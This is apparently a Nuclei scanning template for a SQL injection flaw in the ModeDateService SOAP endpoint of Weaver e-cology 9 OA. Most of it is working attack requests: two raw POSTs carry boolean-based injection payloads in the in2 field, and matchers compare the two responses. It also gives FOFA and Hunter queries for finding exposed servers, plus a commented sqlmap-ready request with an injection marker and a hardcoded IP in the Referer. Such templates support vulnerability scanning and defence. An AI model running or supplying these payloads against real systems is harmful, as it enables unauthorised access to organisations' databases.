id: weaver-ecology-v9-ModeDateService-sqli
info:
  name: 泛微 OA E-Cology 9 ModeDateService - sqli
  author: leadlife
  severity: high
  description: 泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统ModeDateService存在SQL注入漏洞。
  reference: 
    - https://mp.weixin.qq.com/s/E0uF0JIbMdSE5OErmWuj6g
  metadata:
    verified: true
    fofa-query: app="泛微-协同商务系统"
    hunter-query: app.name=="泛微 e-cology 9.0 OA"
    tips: 可能存在小概率的误报，注意对比两个response中的<ns1:out>xxx</ns1:out>部分
  tags: weaver,sqli,oa,ecology

http:
  - raw:
      - |
        POST /services/ModeDateService HTTP/1.1
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: http://{{Hostname}}//services/Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
        Connection: close
        SOAPAction: 
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}} 
        Content-Length: 405

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
          <soapenv:Header/>   
          <soapenv:Body>
              <mod:getAllModeDataCount>
            <mod:in0>1</mod:in0>         
            <mod:in1>1</mod:in1>         
            <mod:in2>1=1 and 5612=5612</mod:in2>         
            <mod:in3>1</mod:in3>
            </mod:getAllModeDataCount>
          </soapenv:Body>
        </soapenv:Envelope>
      
      - |+
        POST /services/ModeDateService HTTP/1.1
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: http://{{Hostname}}//services/Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
        Connection: close
        SOAPAction: 
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}} 
        Content-Length: 405

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
          <soapenv:Header/>   
          <soapenv:Body>
              <mod:getAllModeDataCount>
            <mod:in0>1</mod:in0>         
            <mod:in1>1</mod:in1>         
            <mod:in2>1=1 and 5612=5613</mod:in2>         
            <mod:in3>1</mod:in3>
            </mod:getAllModeDataCount>
          </soapenv:Body>
        </soapenv:Envelope>
      
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && status_code_2 == 200
          - contains_all(body_1,'soap')
          - contains_all(body_2,'out>0<')
        condition: and

# sqlmap

# POST /services/ModeDateService HTTP/1.1
# Host: 
# User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
# Content-Length: 405
# Content-Type: text/xml;charset=UTF-8
# Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
# Referer: http://114.117.242.98/services/
# SOAPAction: 
# Accept-Encoding: gzip

# <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
#    <soapenv:Header/>
#    <soapenv:Body>
#       <mod:getAllModeDataCount>
#          <mod:in0>1</mod:in0>
#          <mod:in1>1</mod:in1>
#          <mod:in2>1=1*</mod:in2>
#          <mod:in3>1</mod:in3>
#       </mod:getAllModeDataCount>
#    </soapenv:Body>
# </soapenv:Envelope>